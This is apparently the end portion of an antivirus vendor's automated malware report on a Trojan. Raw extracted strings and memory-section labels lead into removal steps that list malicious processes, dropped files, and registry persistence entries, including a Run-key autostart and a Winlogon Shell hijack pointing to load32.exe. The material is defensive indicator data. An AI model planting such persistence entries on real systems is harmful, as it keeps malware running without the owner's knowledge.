NT\CurrentVersion\ProfileList\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificatespublicKeyTokenSoftware\Microsoft\Windows\CurrentVersion\SideBySide\Winners\!"#$%&'()* ,-./0123456789:;<=>?@3, 3, 5, 0BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.BoxedAppSDK.dllcvtres.exe_3500_rwx_10000000_00001000:
.text`.rdata@.reloccvtres.exe_3500_rwx_62480000_00001000:
.text0`.data.rdata0@.bss.edata0@.idata.rsrc.reloccvtres.exe_3500_rwx_62E80000_00001000:
.textP`.data.rdata`@.bss.edata0@.idata.rsrc.reloc
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WScript.exe:2280
WScript.exe:3524
wuauclt.exe:304
cvtres.exe:2696
cvtres.exe:3396
vbc.exe:1128
vbc.exe:2912
vbc.exe:2688
vbc.exe:3780
vbc.exe:672 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
C:\NTKernel\63462.exe (32324 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
C:\NTKernel\nt32.exe (2105 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows" - Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.